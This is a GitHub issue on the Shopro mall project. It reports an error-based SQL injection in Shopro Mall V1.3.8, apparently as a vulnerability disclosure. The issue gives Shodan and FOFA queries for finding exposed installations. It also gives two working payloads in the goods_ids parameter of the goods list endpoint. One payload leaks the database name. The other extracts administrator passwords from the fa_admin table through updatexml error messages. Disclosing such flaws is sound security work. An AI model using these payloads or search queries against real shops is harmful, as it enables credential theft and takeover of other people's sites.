ITmonkey-cn / shopro-uniapp

Shopro分销商城 uniapp前端开源代码,一款落地生产的 基于uni-app的多端商城。使用文档:https://gitee.com/itmonkey-cn/shopro.git
https://gitee.com/itmonkey-cn/shopro.git
1.27k stars 317 forks source link

There‘s SQL injection in Shopro Mall system V1.3.8 #16

Open secf0ra11 opened 2 years ago

secf0ra11 commented 2 years ago

Shopro Mall system V1.3.8 Value parameter has SQL injection

Shopro Mall system

Official Website:https://shopro.top Github:https://github.com/ITmonkey-cn/shopro.git

Search

shodan:http.title:"shopro" fofa:title="shopro"

Vulnerability Type

Error-Based SQL Injection

Vulnerability Version

V1.3.8

Recurring environment:

Vulnerability Description AND recurrence

  1. F12 find something interesting

  2. parameter goods_ids has sql error message

    http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
  3. Find information whit Error-Based SQL Injection

    http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select group_concat(password) from fa_admin),0x7e),1)-- -

Ref

https://github.com/secf0ra11/secf0ra11.github.io/blob/main/Shopro_SQL_injection.md